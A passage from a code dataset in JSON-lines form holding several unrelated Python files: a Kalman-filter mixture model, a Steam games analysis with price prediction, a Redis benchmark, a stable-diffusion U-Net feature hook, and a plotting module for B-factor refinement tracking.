entropies\n elbo = seperate_elbos.sum()\n\n self.lower_bound = elbo\n self.expected_likelihoods = expected_likelihoods\n self.entropies = entropies\n\n return elbo\n\n\ndef _initialize_filter(transition_matrix, observation_matrix,\n transition_covariance, observation_covariance,\n initial_state_mean, initial_state_covariance,\n responsibilities):\n \"\"\"\n creates kalman filter object from model parameters and responsibilities\n if responsibilities are zero for any observation it will not be included\n to avoid infinite varaince in the observation covariance matrix for all\n observation.\n\n each filter object has its corresponding model paramters and a large block\n diagonal matrix of the observation covariance scaled by the responsibility\n\n returns a filter object and a boolean array of included observations\n \"\"\"\n\n included = np.logical_not(np.isclose(responsibilities, 0))\n observation_dim = np.sum(included)\n\n if observation_dim > 0:\n block_observation_covariance = sp.linalg.block_diag(\n *[observation_covariance / r for r in responsibilities[included]]\n )\n\n f = KalmanFilter(\n transition_matrices=transition_matrix,\n observation_matrices=np.tile(\n observation_matrix, (observation_dim, 1)\n ),\n transition_covariance=transition_covariance,\n observation_covariance=block_observation_covariance,\n initial_state_mean=initial_state_mean,\n initial_state_covariance=initial_state_covariance,\n n_dim_state=1, n_dim_obs=observation_dim\n )\n else:\n f = None\n\n return f, included\n\n\n\"\"\"\nPARAMETER UPDATES\n\"\"\"\n\n\ndef _responsibilities_update(expected_conditional_likelihoods):\n responsibilities = np.exp(\n expected_conditional_likelihoods -\n logsumexp(expected_conditional_likelihoods)\n )\n\n return responsibilities\n\n\ndef _expected_squared_error(observation, state_means, state_covariances,\n observation_precision, observation_matrix):\n\n \"\"\"\n (y-x)T R-1 (y-x)\n \"\"\"\n T = observation.shape[0]\n expected_squared_error = 0\n for t in range(T):\n residual = (observation[t] -\n np.dot(observation_matrix, state_means[t])\n ).reshape(-1, 1)\n expected_squared_error += np.linalg.multi_dot([\n residual.T,\n observation_precision,\n residual\n ])\n\n expected_squared_error += np.linalg.multi_dot([\n observation_precision,\n observation_matrix,\n state_covariances.sum(axis=0),\n observation_matrix\n ])\n\n return expected_squared_error\n\n\ndef _expected_squared_errors(data, state_means, state_covariances,\n observation_covariance, observation_matrix):\n N = data.shape[0]\n K = state_means.shape[0]\n expected_squared_errors = np.empty((N, K))\n observation_precision = np.linalg.pinv(observation_covariance)\n for j, observation in enumerate(data):\n for k in range(K):\n expected_squared_errors[j, k] = _expected_squared_error(\n observation=observation,\n state_means=state_means[k],\n state_covariances=state_covariances[k],\n observation_precision=observation_precision,\n observation_matrix=observation_matrix\n )\n return expected_squared_errors\n\n\n\"\"\"\nEXPECTED LIKELIHOOD AND ENTROPY STUFF\n\"\"\"\n\n\ndef _expected_observation_likelihood(observation, responsibilities,\n state_means, state_covariances,\n observation_covariance,\n component_weights):\n \"\"\"\n expected likelihood of a single observation sequence\n expectation taken over posterior distribution of assignment\n and state sequences\n \"\"\"\n expected_conditional_likelihoods = _expected_conditional_likelihoods(\n observation, state_means, state_covariances,\n observation_covariance, component_weights\n )\n\n expected_observation_likelihood = np.sum(\n responsibilities * expected_conditional_likelihoods\n )\n\n return expected_observation_likelihood\n\n\ndef _expected_conditional_likelihoods(observation, state_means,\n state_covariances,\n observation_covariance,\n component_weights):\n \"\"\"\n expected likelihood of an observation given a component\n returns a K vector where each is the conditional expected\n likelihood that the observation was generated from that component\n note this includes component mixture probability\n \"\"\"\n\n T = observation.shape[0]\n K = component_weights.shape[0]\n\n conditional_expected_likelihoods = np.zeros(K)\n\n observation_precision = np.linalg.pinv(observation_covariance)\n for k in range(K):\n sub = 0\n for t in range(T):\n sub += _expected_normal_logpdf(\n x=observation[t],\n mean=state_means[k, t],\n covariance=observation_covariance,\n precision=observation_precision,\n mean_covariance=state_covariances[k, t]\n )\n\n conditional_expected_likelihoods[k] = \\\n np.log(component_weights[k]) + sub\n\n return conditional_expected_likelihoods\n\n\ndef _expected_sequence_likelihood(initial_state_mean, initial_state_covariance,\n transition_covariance, state_means,\n state_covariances, pairwise_covariances):\n\n \"\"\"\n expectation of state sequence likelihood\n expectation taken over estimated state distribution\n \"\"\"\n expected_sequence_likelihood = 0\n expected_sequence_likelihood += _expected_normal_logpdf(\n x=state_means[0],\n mean=initial_state_mean,\n covariance=initial_state_covariance,\n mean_covariance=state_covariances[0]\n )\n\n T = state_means.shape[0]\n for t in range(1, T):\n covariance = state_covariances[t] + state_covariances[t-1] - \\\n (2 * pairwise_covariances[t])\n\n expected_sequence_likelihood += _expected_normal_logpdf(\n x=state_means[t],\n mean=state_means[t-1],\n covariance=transition_covariance,\n mean_covariance=covariance\n )\n\n return expected_sequence_likelihood\n\n\ndef _assignment_entropy(responsibilities):\n \"\"\"\n entropy of posterior assignment estimate\n \"\"\"\n active_responsibilities = responsibilities[\n np.logical_not(np.isclose(responsibilities, 0))]\n assignment_entropy = -1 * \\\n (active_responsibilities * np.log(active_responsibilities)).sum()\n return assignment_entropy\n\n\ndef _state_sequence_entropy(state_covariances, pairwise_covariances):\n \"\"\"\n entropy of posterior state sequence estimate\n state_covariances: T x V x V covariance matrices for state estimates\n pairwise_covariances: T x V x V\n t-th entry covariance matrix for states at time t, t-1\n \"\"\"\n T = state_covariances.shape[0]\n state_sequence_entropy = 0\n state_sequence_entropy += \\\n multivariate_normal.entropy(cov=state_covariances[0])\n\n for t in range(1, T):\n # covariance of state at time t given state at time t-1\n covariance = state_covariances[t] - np.linalg.multi_dot([\n pairwise_covariances[t],\n state_covariances[t-1],\n pairwise_covariances[t]\n ])\n state_sequence_entropy += multivariate_normal.entropy(cov=covariance)\n\n return state_sequence_entropy\n\n\ndef _update_observation_covariance(data, state_means, state_covariances,\n responsibilities):\n \"\"\"\n observation covariance update for all filters\n \"\"\"\n N, T = data.shape[:2]\n K = responsibilities.shape[1]\n\n observation_covariance = 0\n for n in range(N):\n for k in range(K):\n for t in range(T):\n observation = data[n, t].reshape(-1, 1)\n state = state_means[k, t].reshape(-1, 1)\n yy = np.dot(observation, observation.T)\n xx = np.dot(state, state.T)\n xy = np.dot(state, observation.T)\n\n P = xx + state_covariances[k, t]\n\n observation_covariance += responsibilities[n, k] * (\n yy - xy - xy.T + P\n )\n observation_covariance = observation_covariance / (N * T)\n return observation_covariance\n\n\ndef _update_transition_covariances(transition_matrix, state_means,\n state_covariances, pairwise_covariances):\n\n return filtermethods._em_transition_covariance(\n transition_matrices=transition_matrix,\n transition_offsets=np.array([0]),\n smoothed_state_means=state_means,\n smoothed_state_covariances=state_covariances,\n pairwise_covariances=pairwise_covariances\n )\n\n\ndef _update_component_weights(responsibilities):\n component_weights = responsibilities.sum(axis=0) / responsibilities.sum()\n return component_weights\n\n\ndef _update_initial_state_means(state_means):\n # initial state distributions\n return state_means[:, 0]\n\n\ndef _update_initial_state_covariance(initial_state_mean, state_means,\n state_covariances):\n\n initial_state_covariance = filtermethods._em_initial_state_covariance(\n initial_state_mean=initial_state_mean,\n smoothed_state_means=state_means,\n smoothed_state_covariances=state_covariances\n )\n\n return initial_state_covariance\n\n\ndef _expected_normal_logpdf(x=None, mean=None, covariance=None, precision=None,\n mean_covariance=None):\n\n if precision is None:\n precision = np.linalg.pinv(covariance)\n\n expected_normal = 0\n expected_normal += \\\n multivariate_normal.logpdf(x=x, mean=mean, cov=covariance)\n expected_normal += -0.5 * np.trace(np.dot(\n np.linalg.pinv(covariance),\n mean_covariance\n ))\n return expected_normal\n","repo_name":"karltayeb/myc-analysis","sub_path":"develop/LDSMixture.py","file_name":"LDSMixture.py","file_ext":"py","file_size_in_byte":24854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"33077520132","text":"import ast \nimport pandas as pd\nimport json\nfrom typing import Dict\n\nrows = []\nwith open ('steam_games.json') as f: # f contains the data of the archive\n for line in f.readlines():\n rows.append(ast.literal_eval(line))\ndf1 = pd.DataFrame(rows)\n\n# Change to NaT the data that is not in yyyy-mm-dd format\ndf1['release_date'] = pd.to_datetime(df1['release_date'], format='%Y-%m-%d', errors='coerce')\n\n#Do a filter in release date to drop NaN\ndff = df1.dropna(subset= ['release_date'])\n\n#Change to datetime the release date\ndff['release_date'] = pd.to_datetime(dff['release_date'])\n\n#Unnest the colum genres in the dataframe\ndf_anid = dff.explode('genres')\n\n \n\ndef get_genero(year: int):\n df = df_anid[['release_date','genres']]\n \n#Convert the time to datetime object.Then it converts the datetime object to period object with a yearly frequency\n years = pd.to_datetime(year,format = '%Y').to_period('Y')\n \n#Filter the selectiong the rows only when the period is equal to the year stored in the variable\n df_filter = df[df['release_date'].dt.to_period('Y') == years]\n df_top = df_filter['genres'].value_counts()\n top_genres = df_top.head(5)\n return {year: top_genres.to_dict()}\n\n#print(genero(2014))\n\n \ndef get_juegos(year: int):\n df = dff[['release_date','app_name']]\n#Convert the time to datetime object.Then it converts the datetime object to period object with a yearly frequency\n years = pd.to_datetime(year,format = '%Y').to_period('Y')\n \n#Filter the selectiong the rows only when the period is equal to the year stored in the variable\n df_filter = df[df['release_date'].dt.to_period('Y') == years]\n \n#Converted the column into a list,transform to string and contain it in the variable\n juegos_lanzados = df_filter['app_name'].astype(str).tolist()\n juegos_dict = {juego for juego in juegos_lanzados}\n return {year: juegos_dict}\n\n#print(juegos(2014))\n\ndef get_specs(year: int):\n df = dff[['release_date','specs']]\n years = pd.to_datetime(year,format = '%Y').to_period('Y')\n df_filter = df[df['release_date'].dt.to_period('Y') == years]\n df_filter = df_filter.explode('specs')\n df_top = df_filter['specs'].value_counts()\n top_specs = df_top.head(5)\n return {year: top_specs.to_dict()}\n\n#print(specs(2014))\n\ndef get_earlyaccess(year: int):\n df = dff[['release_date','early_access']]\n years = pd.to_datetime(year,format = '%Y').to_period('Y')\n df_filter = df[(df['release_date'].dt.to_period('Y') == years) & (df['early_access'] == True)] \n num_early_access = len(df_filter) #Count the number of rows with True\n return {year: num_early_access}\n\n#print(earlyaccess(2014))\n\ndef get_sentiment( year : int):\n dfs = dff[['sentiment','release_date']]\n \n #Use isin to created a boolean series that indicate the value of the column\n #The ~ operator is used to invert the boolean series. \n mask = ~dfs['sentiment'].isin(['Overwhelmingly Positive','Mostly Positive','Very Positive','Positive', 'Mixed', 'Negative','Mostly Negative','Very Negative','Overwhelmingly Negative'])\n \n #Select the rows where the mask is True and set that values in the column for None\n dfs.loc[mask, 'sentiment'] = 'None'\n years = pd.to_datetime(year,format = '%Y').to_period('Y')\n df_filter = dfs[dfs['release_date'].dt.to_period('Y') == years] \n critics = df_filter['sentiment']\n num_critics = critics.value_counts() \n return {year: num_critics.to_dict()}\n\n#print(sentiment(2014))\n\ndef get_metascore(year: int):\n df = dff[['metascore','release_date','app_name']]\n # Filter the data to only include rows where the release date is in the specified year\n df_filtered = df[df['release_date'].dt.year == year]\n \n # Sort the rows by metascore in descending order\n df_sorted = df_filtered.sort_values(by='metascore', ascending=False)\n df_sorted['metascore'] = pd.to_numeric(df_sorted['metascore'], errors='coerce', downcast='integer')\n df_sorted['metascore'] = df_sorted['metascore'].fillna(0)\n \n # Get the names and metascores of the top 5 games\n top_games = df_sorted[['app_name', 'metascore']].head(5)\n \n # Convert the result to a dictionary\n result = top_games.set_index('app_name')['metascore'].apply(int).to_dict()\n \n return {year: result}\n\n#print(metascore(2014))\n\n\nimport pickle\n\nfrom pandas import to_numeric\n \ndef get_predict(year, early_access, sentiment, genre):\n # Load the saved model from a file\n with open('model_and_rmse.pkl', 'rb') as file:\n data = pickle.load(file)\n \n # Unpack the tuple and extract the model\n model, rmse_train, rmse_test = data\n \n # Create a list of all possible genres\n all_genres = ['Indie','Action','Adventure','Casual','Simulation',\n 'Strategy','RPG','Early Access','Free to Play','Sports','Massively Multiplayer']\n \n # Create a one-hot encoded representation of the input genre\n genre_encoded = [1 if g == genre else 0 for g in all_genres]\n \n # Create input data for prediction\n X = [[year, early_access, sentiment] + genre_encoded]\n \n # Make prediction\n y_pred = model.predict(X)\n \n # Return prediction as a scalar value\n return {'predict price': round(to_numeric(y_pred[0]), 2), 'rmse_train': rmse_train, 'rmse_test': rmse_test}\n\n\n\n#print(get_predict(2014,1,3,'Indie'))","repo_name":"LLozanoBaron/Project_MLops","sub_path":"codigo.py","file_name":"codigo.py","file_ext":"py","file_size_in_byte":5353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14124511809","text":"import asyncio\n\nimport uvloop\nimport zangy\n\nuvloop.install()\n\n\nasync def main():\n pool = await zangy.create_pool(\"redis://localhost\", 10, 0)\n futures = []\n for i in range(1000000):\n futures.append(pool.set(f\"bench{i}\", \"yes\"))\n await asyncio.gather(*futures)\n\n\nasyncio.run(main())\n","repo_name":"Gelbpunkt/zangy","sub_path":"bench/bench_zangy.py","file_name":"bench_zangy.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"92"} +{"seq_id":"998904464","text":"from typing import TYPE_CHECKING\n\nfrom torch import nn, Tensor\n\nfrom modules.processing import StableDiffusionProcessing\n\nfrom scripts.dumpunetlib import layerinfo\nfrom scripts.dumpunetlib.feature_extractor import FeatureExtractorBase\nfrom scripts.dumpunetlib.features.featureinfo import FeatureInfo\nfrom scripts.dumpunetlib.features.utils import feature_to_grid_images, save_features\nfrom scripts.dumpunetlib.report import message as E\nfrom scripts.dumpunetlib.utils import *\nfrom scripts.dumpunetlib.colorizer import Colorizer\n\nif TYPE_CHECKING:\n from scripts.dumpunet import Script\n\nclass FeatureExtractor(FeatureExtractorBase[FeatureInfo]):\n \n def __init__(\n self,\n runner: \"Script\",\n enabled: bool,\n total_steps: int,\n layer_input: str,\n step_input: str,\n path: str|None,\n ):\n super().__init__(runner, enabled, total_steps, layer_input, step_input, path)\n \n def hook_unet(self, p: StableDiffusionProcessing, unet: nn.Module):\n \n #time_embed : nn.modules.container.Sequential\n #input_blocks : nn.modules.container.ModuleList\n #middle_block : ldm.modules.diffusionmodules.openaimodel.TimestepEmbedSequential\n #output_blocks : nn.modules.container.ModuleList\n #out_ : nn.modules.container.Sequential\n #time_embed = unet.time_embed\n #input_blocks = unet.input_blocks\n #middle_block = unet.middle_block\n #output_blocks = unet.output_blocks\n #out_ = unet.out\n #summary(unet, (4, 512, 512))\n \n def create_hook(layername: str):\n \n def forward_hook(module, inputs, outputs):\n if self.steps_on_batch in self.steps:\n self.log(f\"{self.steps_on_batch} {layername} {inputs[0].size()} {outputs.size()}\")\n \n images_per_batch = p.batch_size\n \n for image_index, output in enumerate(\n outputs.detach().clone()[:images_per_batch],\n (self.batch_num-1) * images_per_batch\n ):\n features = self.extracted_features[image_index][self.steps_on_batch]\n features.add(\n layername,\n FeatureInfo(\n [ x.size() for x in inputs if type(x) == Tensor ],\n output.size(),\n output\n )\n )\n return forward_hook\n \n for layer in self.layers:\n self.log(f\"U-Net: hooking {layer}...\")\n target = get_unet_layer(unet, layer)\n self.hook_layer(target, create_hook(layer))\n \n def feature_to_grid_images(self, feature: FeatureInfo, layer: str, img_idx: int, step: int, width: int, height: int, average_type: str|None, color: Colorizer):\n return feature_to_grid_images(feature, layer, width, height, average_type, color)\n \n def save_features(self, feature: FeatureInfo, layer: str, img_idx: int, step: int, width: int, height: int, path: str, basename: str):\n save_features(feature, path, basename)\n \ndef get_unet_layer(unet, layername: str) -> nn.modules.Module:\n idx = layerinfo.input_index(layername)\n if idx is not None:\n return unet.input_blocks[idx]\n \n idx = layerinfo.middle_index(layername)\n if idx is not None:\n return unet.middle_block\n \n idx = layerinfo.output_index(layername)\n if idx is not None:\n return unet.output_blocks[idx]\n \n raise ValueError(E(f\"Invalid layer name: {layername}\"))\n","repo_name":"hnmr293/stable-diffusion-webui-dumpunet","sub_path":"scripts/dumpunetlib/features/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"92"} +{"seq_id":"37052444455","text":"import os, collections\nimport numpy\nfrom libtbx import adopt_init_args\n\nfrom pandemic.adp import constants\n\n\nclass PandemicTrackingPlotter:\n\n _snapshots_png = 'tracking_snapshots.png'\n _level_convergence_png = 'tracking_convergence.png'\n _rmsds_convergence_png = 'tracking_rmsds.png'\n _delta_u_png_prefix = 'tracking_atoms'\n\n def __init__(self,\n parent,\n output_directory,\n plotting_object,\n ):\n\n output_files = collections.OrderedDict(\n snapshots = os.path.join(output_directory, self._snapshots_png),\n level_convergence = os.path.join(output_directory, self._level_convergence_png),\n rmsds_convergence = os.path.join(output_directory, self._rmsds_convergence_png),\n model_changes = collections.OrderedDict(),\n )\n\n adopt_init_args(self, locals())\n\n def __call__(self):\n\n self.cycle_snapshot_plot(\n table = self.parent.table,\n filename = self.output_files['snapshots'],\n )\n\n self.level_convergence_plot(\n table = self.parent.table,\n filename = self.output_files['level_convergence']\n )\n\n self.rmsds_convergence_plot(\n table = self.parent.table_by_dataset,\n filename = self.output_files['rmsds_convergence'],\n )\n\n uij_delta_eigenvalues = self.parent.uij_history.get_delta_eigenvalues()\n\n of = self.delta_u_plots(\n delta_eigenvalues = uij_delta_eigenvalues.mean(axis=1),\n structure_factory = self.parent.structure_factory,\n prefix = os.path.join(self.output_directory, self._delta_u_png_prefix),\n )\n self.output_files['model_changes'] = of\n\n return self.output_files\n\n def cycle_snapshot_plot(self,\n table,\n filename,\n number_to_plot=5,\n ):\n\n from matplotlib import pyplot\n\n # Useful functions\n helper = self.plotting_object.helper\n\n start_cycle = min(table['cycle'])\n n = max(table['cycle'])\n # trim the table to certain rows\n cycles_to_plot = range(start_cycle, n, int(n/number_to_plot)+1) + [n]\n cycles_to_plot_bool = table['cycle'].isin(cycles_to_plot)\n table = table[cycles_to_plot_bool]\n\n # Group by cycle & step to allow stacking\n grouped = table.groupby(['cycle','step'], sort=False, as_index=False)\n n_total = len(grouped)\n grouped_reduced = grouped.max()\n grouped_reduced['x'] = range(len(grouped_reduced))\n\n # Previous cycle variables for connecting lines\n prev_x = prev_r = prev_b = None\n\n # Setup plot and plot args - do in convoluted way to allow hiding of x-ticks\n # fig, axes = pyplot.subplots(nrows=2, ncols=1, sharex=True, sharey=False)\n # axes = numpy.array(axes).flatten() # Creates list if only one plot\n fig = pyplot.figure()\n ax1 = fig.add_subplot(2,1,1)\n ax2 = fig.add_subplot(2,1,2, sharex=ax1)\n axes = [ax1, ax2]\n\n # Get ls/ms outside of loop\n lw = helper.lw(grouped.ngroups)\n ms = helper.ms(grouped.ngroups)\n\n # Iterate through the cycles\n for n_cycle, cycle_info in grouped_reduced.groupby('cycle', sort=False):\n\n x_vals = cycle_info['x'].values\n r_vals = cycle_info['rmsd'].values\n b_vals = cycle_info['b_avg (total)'].values\n\n # Create RMSD plot\n hdl1 = axes[0].plot(\n x_vals, r_vals, 'bo-',\n label = 'rmsd',\n linewidth = lw, markersize = ms,\n )\n if prev_x is not None:\n axes[0].plot(\n [prev_x, x_vals[0]], [prev_r, r_vals[0]], 'b:',\n label = 'rmsd',\n linewidth = lw, markersize = ms,\n )\n # Create an overall B-iso TOTAL line\n hdl2 = axes[1].plot(\n x_vals, b_vals, 'ko-',\n label = 'total',\n linewidth = lw, markersize = ms,\n )\n if prev_x is not None:\n axes[1].plot(\n [prev_x, x_vals[0]], [prev_b, b_vals[0]], 'k:',\n label = 'total',\n linewidth = lw, markersize = ms,\n )\n\n prev_x = x_vals[-1]\n prev_r = r_vals[-1]\n prev_b = b_vals[-1]\n\n # Other plot -- done as one\n\n x_vals = numpy.arange(0, grouped.ngroups)\n x_keys = [v[0] for v in grouped] # remove\n x_labs = [v[1] for v in x_keys] # remove\n\n # Create B-iso lines for each LEVEL\n colours = self.plotting_object.get_level_colours()\n # handles for figure legend (NOT axis legend)\n figure_legend_handles = []\n\n # Bottoms of bar where stacking occurs\n y_cuml = numpy.zeros(len(x_vals))\n # Iterate through the levels and plot cumulative bars\n for lvl_no in sorted(set(table['level#'])):\n if lvl_no is None: continue\n assert isinstance(lvl_no, int)\n # Get values\n sel = (table['level#'] == lvl_no)\n sel_t = table[sel]\n lvl_name = sel_t['level'].values[0]\n\n # The indices of the x-axis positions\n i_x = [x_keys.index(v) for v in map(tuple,sel_t[['cycle','step']].values.tolist())]\n # Extract y_vals\n y_vals = sel_t['b_avg'].values\n\n # Plot\n hdl = axes[1].bar(\n x = x_vals[i_x],\n height = y_vals,\n bottom = y_cuml[i_x],\n width = 0.8,\n color = colours[lvl_no-1],\n edgecolor = 'k',\n linewidth = 0.5,\n align = 'center',\n label = '{}: {}'.format(lvl_no, lvl_name),\n )\n figure_legend_handles.append(hdl)\n # Add to cuml\n y_cuml[i_x] = y_cuml[i_x] + y_vals\n\n #\n # Axis stuff\n #\n # 1\n ax = axes[0]\n # ax.xaxis.set_ticks_position('bottom')\n helper.set_axis_labels(\n axis = ax,\n title = 'Model Fit',\n x_label = None,\n y_label = 'Model fit\\n($\\AA^2$)',\n )\n helper.hide_x_labels(axis=ax)\n #ax.set_ylim(bottom=0.0)\n ax.set_yscale('log')\n #\n # 2\n ax = axes[1]\n #ax.xaxis.set_ticks_position('bottom')\n helper.set_axis_labels(\n axis = ax,\n title = 'Model B-factors',\n x_label = 'Optimisation Stage/Cycle',\n y_label = 'Isotropic B\\n($\\AA^2$)',\n )\n helper.make_x_ticks(\n axis = ax,\n x_ticks = x_vals,\n x_tick_labels = x_labs,\n n_labels = 20,\n )\n helper.rotate_x_tick_labels(axis=ax)\n ax.set_xlim(left=-0.5, right=max(x_vals)+0.5)\n ax.set_ylim(bottom=0.0)\n\n # Add legend to first graph for both lines\n lgd0a = axes[0].legend(handles=hdl1, bbox_to_anchor=(1.02, 0.95), loc=2, borderaxespad=0.)\n lgd0b = axes[1].legend(handles=hdl2, bbox_to_anchor=(1.02, 0.95), loc=2, borderaxespad=0.)\n\n # BOTH AXES -- Add vertical lines between macro-cycles\n start_x = x_vals[[x_keys.index(v[:2]) for v in map(tuple,table[['cycle','step','level#']].values.tolist()) if v[1]=='start' and v[2]==1]]\n n_cycles = len(start_x)\n x_max = max(x_vals)\n last_v = delta = None\n for i, v in enumerate(start_x - 0.5):\n # Dashed lines to separate cycles\n if (v > 0) and (v < x_max):\n for ax in axes:\n ax.axvline(x=v, linewidth=1, zorder=1, color='k', linestyle='--')\n # Text to label each cycle\n if (last_v is not None):\n delta = v - last_v\n axes[0].text(\n x = last_v+delta/2.0,\n y = 0.1*axes[0].get_ylim()[0] + 0.9*axes[0].get_ylim()[1],\n s = 'cycle '*(n_cycles<6) +str(cycles_to_plot[i-1]), # This is plotting the previous point so need -1\n horizontalalignment = 'center',\n verticalalignment = 'top',\n )\n last_v = v\n # Plot the last point (or do nothing for 1 cycle)\n if delta is not None:\n axes[0].text(\n x = min(v+delta/2.0, axes[0].get_xlim()[1]),\n y = 0.1*axes[0].get_ylim()[0] + 0.9*axes[0].get_ylim()[1],\n s = 'cycle '*(n_cycles<6) +str(cycles_to_plot[i]), # This does not need a -1\n horizontalalignment = 'center',\n verticalalignment = 'top',\n )\n\n # Create legend\n lgd1 = fig.legend(\n handles=figure_legend_handles, ncol=3,\n bbox_to_anchor=(0.5, 0.0),\n bbox_transform=fig.transFigure,\n loc=9, borderaxespad=0.,\n )\n\n helper.write_and_close_fig(\n fig=fig,\n filename=filename,\n bbox_extra_artists=[lgd0a,lgd0b,lgd1],\n )\n\n def level_convergence_plot(self,\n table,\n filename,\n ):\n\n from matplotlib import pyplot\n\n # Useful functions\n helper = self.plotting_object.helper\n\n # fig, axes = pyplot.subplots(nrows=2, ncols=1, sharex=True, sharey=False)\n # axes = numpy.array(axes).flatten() # Creates list if only one plot\n fig = pyplot.figure()\n ax1 = fig.add_subplot(2,1,1)\n ax2 = fig.add_subplot(2,2,3)\n ax3 = fig.add_subplot(2,2,4, sharex=ax2)\n axes = [ax1, ax2, ax3]\n\n # Extract only end-of-cycle optimisation values (last step of each cycle)\n table = table[(table['step']=='end')]\n # Labels for each of the series to plot\n m_cyc = 0 if (len(table) == 0) else min(table['cycle'])\n labels = table[table['cycle']==m_cyc]['level'].values\n # Extract common list of x-values\n x_keys = sorted(set(table['cycle'].values))\n x_vals = numpy.array(x_keys)\n\n # Colours for each level\n colours = self.plotting_object.get_level_colours()\n # List of handles for figure legend (NOT axis legend)\n figure_legend_handles = []\n\n ########################\n # FIRST AXIS\n ########################\n ax = axes[0]\n # Cumulative y-values for stacking\n y_cuml = numpy.zeros(len(x_vals))\n # Plot same values as stacked bars\n for l_name in labels:\n assert isinstance(l_name, str)\n # Extract relevant rows from table\n l_table = table[table['level']==l_name]\n l_no = l_table['level#'].values[0]\n # Extract plot vals\n i_x = [x_keys.index(v) for v in l_table['cycle'].values]\n y_vals = l_table['b_avg'].values\n # Plot stacked bar\n hdl = ax.bar(\n x = x_vals[i_x],\n height = y_vals,\n bottom = y_cuml[i_x],\n width = 1.0,\n color = colours[l_no-1],\n edgecolor = 'k',\n linewidth = 0.5,\n align = 'center',\n label = '{}: {}'.format(l_no, l_name),\n )\n figure_legend_handles.append(hdl)\n # Add to cuml\n y_cuml[i_x] = y_cuml[i_x] + y_vals\n\n ########################\n # SECOND AXIS\n ########################\n ax = axes[1]\n for l_name in labels:\n assert isinstance(l_name, str)\n # Extract relevant rows from table\n l_table = table[table['level']==l_name]\n l_no = l_table['level#'].values[0]\n # Extract plot vals\n x_vals = l_table['cycle'].values\n y_vals = l_table['b_avg'].values\n nx = len(x_vals)\n\n hdl_ = ax.plot(\n x_vals, y_vals, 'ko-',\n linewidth = helper.lw(nx, 'chunky'),\n markersize = helper.ms(nx, 'chunky'),\n )\n hdl_ = ax.plot(\n x_vals, y_vals, 'o-',\n linewidth = helper.lw(nx, 'narrow'),\n markersize = helper.ms(nx, 'narrow'),\n color = colours[l_no-1],\n label = '{}: {}'.format(l_no, l_name),\n )\n\n ########################\n # THIRD AXIS\n ########################\n ax = axes[2]\n for l_name in labels:\n assert isinstance(l_name, str)\n # Extract relevant rows from table\n l_table = table[table['level']==l_name]\n l_no = l_table['level#'].values[0]\n # Extract plot vals\n x_vals = l_table['cycle'].values\n plot_vals = l_table['b_avg'].values\n y_vals = numpy.concatenate(([plot_vals[0]], plot_vals[1:]-plot_vals[:-1]))\n nx = len(x_vals)\n\n hdl_ = ax.plot(\n x_vals, y_vals, 'ko-',\n linewidth = helper.lw(nx, 'chunky'),\n markersize = helper.ms(nx, 'chunky'),\n )\n hdl_ = ax.plot(\n x_vals, y_vals, 'o-',\n linewidth = helper.lw(nx, 'narrow'),\n markersize = helper.ms(nx, 'narrow'),\n color = colours[l_no-1],\n label = '{}: {}'.format(l_no, l_name),\n )\n\n #\n # Axis stuff\n #\n # 1\n ax = axes[0]\n #ax.xaxis.set_ticks_position('bottom')\n helper.set_axis_labels(\n axis = ax,\n title = 'Total B-factors',\n x_label = 'Optimisation Cycle',\n y_label = 'B-factor ($\\AA^2$)',\n )\n helper.make_x_ticks(\n axis = ax,\n x_ticks = x_keys,\n n_labels = 20,\n )\n ax.set_ylim(bottom=0.0)\n #\n # 2\n ax = axes[1]\n helper.set_axis_labels(\n axis = ax,\n title = 'Level B-factors',\n x_label = 'Optimisation Cycle',\n y_label = 'B-factor ($\\AA^2$)',\n )\n helper.make_x_ticks(\n axis = ax,\n x_ticks = x_keys,\n n_labels = 5,\n )\n ax.set_ylim(bottom=0.0)\n #\n # 3\n ax = axes[2]\n helper.set_axis_labels(\n axis = ax,\n title ='Changes between cycles',\n x_label = 'Optimisation Cycle',\n y_label = None,\n )\n ax.set_yscale('symlog', linthreshy=0.1)\n\n # Create legend\n lgd = fig.legend(\n handles=figure_legend_handles, ncol=3,\n bbox_to_anchor=(0.5, 0.0),\n bbox_transform=fig.transFigure,\n loc=9, borderaxespad=0.,\n )\n\n helper.write_and_close_fig(\n fig=fig,\n filename=filename,\n bbox_extra_artists=[lgd],\n )\n\n def rmsds_convergence_plot(self,\n table,\n filename,\n ):\n\n from matplotlib import pyplot\n\n # Useful functions\n helper = self.plotting_object.helper\n\n # Filter the given table\n tmp_table = table[(table['type'] == 'rmsd')]\n # Extract x- and y-values\n x_vals = tmp_table['cycle'].values\n y_vals = tmp_table['overall'].values\n # Calculate the differences between the values\n y_vals_delta = numpy.concatenate(([0.0], y_vals[1:]-y_vals[:-1]))\n # Convert to list?\n\n nx = len(x_vals)\n\n fig, (ax1, ax2) = pyplot.subplots(nrows=2, ncols=1)\n\n # t = fig.suptitle(\n # 'Model fit during optimisation',\n # y = 1.00,\n # verticalalignment='bottom',\n # )\n\n _fig, _axis = self.plotting_object.lineplot(\n axis = ax1,\n x_vals = x_vals,\n y_vals = y_vals,\n title = 'RMSD to target values',\n x_label = 'Cycle',\n y_label = 'RMSD (B-factor; $\\AA^2$)',\n x_ticks = x_vals,\n legends = ['rmsd'],\n filename = None, # returns fig and axis\n legend_kw_args = {'bbox_to_anchor':(1.0, 1.0), 'loc':4, 'borderaxespad':0.5},\n background_line_type = 'chunky',\n )\n\n _fig, _axis = self.plotting_object.lineplot(\n axis = ax2,\n x_vals = x_vals,\n y_vals = y_vals_delta,\n title = 'RMSD change from previous cycle',\n x_label = 'Cycle',\n y_label = 'RMSD (B-factor; $\\AA^2$)',\n x_ticks = x_vals,\n legends = ['$\\Delta$ rmsd'],\n filename = None, # returns fig and axis\n legend_kw_args = {'bbox_to_anchor':(1.0, 1.0), 'loc':4, 'borderaxespad':0.5},\n background_line_type = 'chunky',\n )\n\n # Set log-scale when there are non-zero values\n if len(y_vals) and (numpy.min(y_vals) > 0.0):\n # Set one log-scale above and below\n y_min = 10**numpy.floor(numpy.log10(numpy.min(y_vals)))\n y_max = 10**numpy.ceil(numpy.log10(numpy.max(y_vals)))\n ax1.set_ylim((y_min, y_max))\n ax1.set_yscale('log')\n # Just set sym log for delta plot\n 